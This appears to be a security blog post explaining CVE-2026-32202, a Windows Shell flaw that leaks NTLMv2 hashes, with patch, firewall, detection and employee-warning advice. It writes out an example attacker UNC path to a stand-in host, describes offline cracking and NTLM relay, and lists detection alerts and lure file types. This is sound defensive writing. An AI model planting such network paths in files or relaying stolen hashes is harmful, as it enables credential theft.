CVE-2026-32202: Windows Shell Credential Theft Explained

Amit works at a logistics company in Pune. His manager sent him a file on Teams — a report shortcut, nothing unusual. He double-clicked it. Nothing seemed to happen. No pop-up. No warning. No slow-down. He assumed the file was broken and moved on with his day.

In that single double-click, his Windows computer had silently contacted an attacker's server and handed over his network password — automatically, invisibly, without asking for permission.

The attacker did not need Amit to type his password. Windows did it for him.

Root Cause — The Fix That Left a Door Open

This vulnerability exists because of an incomplete fix — the same pattern we have seen repeatedly in April 2026.

Earlier this year, Microsoft patched a different but related Windows flaw — CVE-2026-21510. That patch addressed the most obvious part of the problem: preventing attackers from running code on your machine through a malicious file. But while fixing that, Microsoft missed something sitting right next to it — the way Windows automatically tries to connect to network locations embedded in certain file types.

CVE-2026-32202 lives in that gap. The code execution path was blocked. The credential leakage path was not.

Security researcher Dahan, who analysed the flaw, described it precisely: "While Microsoft fixed the initial remote code execution flaw, the authentication coercion flaw remained. The gap between path resolution and trust verification left a zero-click credential theft vector via automatically parsed files."

In plain English — Microsoft fixed the more visible danger but missed the quieter one sitting right beside it.

How the Attack Works — The Automatic Handshake

To understand this attack, you need to understand one thing about how Windows works on a network.

When Windows encounters a file path that points to another computer on a network — something like \\server\folder\file — it automatically tries to connect to that location. It does not ask you. It does not warn you. It just connects. And when it connects, it automatically introduces itself using your Windows credentials — your username and an encrypted version of your password — as part of the standard network greeting process.

This automatic introduction is called an NTLM authentication handshake. It happens silently, in milliseconds, every time Windows tries to reach a network location.

Now here is how the attack works.

The attacker creates a malicious file — a shortcut, a document, a folder — that contains a hidden instruction pointing to a server they control. The file path inside it looks like: \\attacker-server.com\share\file. When you open, preview, or even browse to the folder containing this file, Windows sees the network path, automatically reaches out to the attacker's server, and sends your NTLMv2 hash as part of the standard connection greeting.

You never typed your password. You never approved any connection. Windows did it automatically — because that is how it was designed to work on corporate networks.

Think of it like this. You are at a hotel. Every time you walk past the front desk, the hotel automatically announces your name, room number, and a coded version of your key to anyone standing nearby — because that is the standard check-in protocol. An attacker stands near the desk with a recording device. You walk past. They have everything they need — without you ever saying a word or knowing they were there.

What Is an NTLMv2 Hash — And Why Is It Dangerous

Your Windows password is never stored or sent as plain text. Instead, Windows converts it into a scrambled string called a hash — a one-way mathematical transformation of your password. The NTLMv2 hash is what Windows sends during network authentication handshakes instead of the actual password.

Once an attacker has your NTLMv2 hash, they have two options — and both are serious.

Option 1 — Crack it offline. Using powerful computers and lists of common passwords, attackers can try millions of combinations per second until they find the password that produces the same hash. Shorter or common passwords can be cracked in minutes. Even complex passwords can be cracked given enough time and computing power. Once cracked, the attacker has your actual password — usable anywhere you use the same password.

Option 2 — Use it directly without cracking. In a technique called NTLM relay, the attacker does not even need to crack the hash. They immediately forward it to another server on your network, impersonating you in real time. If that server trusts NTLM authentication — and most Windows corporate networks do — the attacker gains access as you, right now, without ever knowing your actual password.

We covered NTLM hash theft and rainbow table cracking in detail earlier this year. The fundamentals are identical:

→ Net-NTLMv1 Is No Longer Safe: Rainbow Tables Explained

The APT28 Connection — Russia Is Using This Right Now

CVE-2026-32202 is not being exploited by random cybercriminals. Security researchers have linked active exploitation to APT28 — Russia's military intelligence hacking unit, run by the GRU. This is the same group behind the 2016 US Democratic National Committee hack, the 2017 NotPetya cyberattack that caused $10 billion in global damage, and dozens of ongoing espionage campaigns across Europe, government institutions, and NATO member countries.

APT28 has used NTLM hash theft as a primary technique for years. They embed malicious UNC paths in documents, emails, and calendar invites — targeting government officials, military personnel, journalists, and anyone connected to organisations they want to infiltrate. The credential they steal from one person becomes the key to the next system. Island hopping — the same technique TeamPCP used in the Trivy and LiteLLM supply chain attacks — applied to government networks.

The fact that a nation-state group is actively using this flaw means two things. The exploit works reliably. And the targets include not just individuals but entire organisations and government networks.

Indicators of Compromise (IOCs)

# CVE-2026-32202 Windows Shell Credential Theft — Detection

# Step 1 — Apply April 2026 Patch Tuesday immediately
# Check Windows Update status:
# Settings → Windows Update → Check for updates
# Ensure KB5058379 (Windows 11) or KB5058392 (Windows 10) is installed
# Verify: winver should show build 26100.3915 or higher on Win 11

# Step 2 — Block outbound SMB at firewall (critical mitigation)
# SMB uses port 445 — block outbound connections on port 445
# at your network firewall for all endpoints
# Most users and companies have no legitimate need for
# outbound SMB to the internet
# Corporate IT: netsh advfirewall firewall add rule ^
#   name="Block Outbound SMB" protocol=TCP dir=out ^
#   remoteport=445 action=block

# Step 3 — Enable Windows Defender Credential Guard
# Prevents NTLM hashes from being used in relay attacks
# Group Policy: Computer Configuration → Administrative Templates
#   → System → Device Guard → Turn on Virtualization Based Security

# Step 4 — Detection signatures in logs
Alert: Outbound SMB connection (port 445) from workstation
       to external/unknown IP address
Alert: explorer.exe or shell processes initiating
       outbound network connections to non-corporate IPs
Alert: NTLM authentication events to unknown external servers
       in Windows Security Event Log (Event ID 4624, Logon Type 3)

# Step 5 — File types used in active APT28 campaigns
# Be especially suspicious of:
# .lnk files (Windows shortcuts)
# .url files (internet shortcuts)
# .cpl files (control panel items)
# Received via email, Teams, WhatsApp, or file sharing
# All can trigger the automatic SMB connection without running code

# Step 6 — Check for compromise indicators
# If you opened a suspicious file before patching:
# Review Windows Security logs for unexpected NTLM auth events
# Change Windows/domain password immediately
# Alert IT team — NTLM relay may have already been used

SOC Alert Priorities

Priority 1 — Apply the April 2026 Patch Tuesday update on every Windows machine today. The patch exists. It is tested. It is free. Every Windows machine without KB5058379 or KB5058392 installed is actively vulnerable to a flaw being used by Russian military intelligence right now. This is a same-day patch — not a scheduled update.

Priority 2 — Block outbound SMB (port 445) at your network firewall immediately. Even before patching is complete, blocking outbound connections on port 445 prevents the credential theft from completing — the attacker's server cannot receive the NTLM handshake if the connection is blocked at the firewall. Most organisations have no legitimate reason for workstations to make outbound SMB connections to the internet. This single firewall rule eliminates the most dangerous exploitation path.

Priority 3 — Alert on all outbound port 445 connections from endpoints. Any workstation attempting an outbound SMB connection to an external IP address is a potential exploitation indicator. Add this detection to your SIEM or firewall logging immediately. A single triggered alert could mean an employee opened a malicious file before the patch was deployed.

Priority 4 — Warn employees specifically about .lnk, .url, and .cpl files. These are the three file types most commonly weaponised in NTLM coercion attacks. They look like ordinary shortcuts and icons. They can trigger the credential theft without the user running any code — just opening the folder they are in may be enough. Employees should treat any of these file types received unexpectedly — via email, Teams, WhatsApp, or file sharing — as potentially malicious.

Priority 5 — Enable Windows Defender Credential Guard across your fleet. Credential Guard prevents NTLM hashes from being used in relay attacks even if they are stolen. It is a built-in Windows feature available on Windows 11 and Windows 10 Enterprise. Enabling it does not stop the hash from being sent — but it makes the stolen hash significantly harder to exploit in follow-on attacks.

The ZyberWalls Perspective

CVE-2026-32202 has a CVSS score of 4.3 — officially classified as Medium severity. That number is almost meaningless in the context of what this flaw actually does.

CVSS scores measure technical severity in isolation — one vulnerability, one system, one impact. They do not measure what happens when a credential theft flaw is chained with an NTLM relay attack and used by a nation-state group against a corporate network. They do not measure the fact that APT28 has been sitting on this technique, using it in real operations, while Microsoft's advisory listed it as moderate severity.

Microsoft revised their advisory on April 27 — updating the exploitability rating after the flaw was already confirmed in active use. This is the same pattern as CVE-2026-21643 in FortiClient EMS, which was exploited for four days before official tracking lists acknowledged it. The gap between real-world exploitation and official severity ratings is becoming one of the most dangerous blind spots in enterprise security.

Amit in Pune double-clicked a file. His password is now in a database somewhere, being cracked or relayed as you read this. He did nothing wrong. He received what looked like a normal file from what looked like a normal source.

The only protection that would have saved him: a patched Windows machine and a firewall rule blocking outbound port 445. Both are available. Both are free. Neither requires expertise to implement.

Patch. Block port 445. Today.

→ Patching Is Losing the Race: Why Attackers Move Faster Than Fixes

→ Your Antivirus Just Became the Attack: Microsoft Defender BlueHammer Explained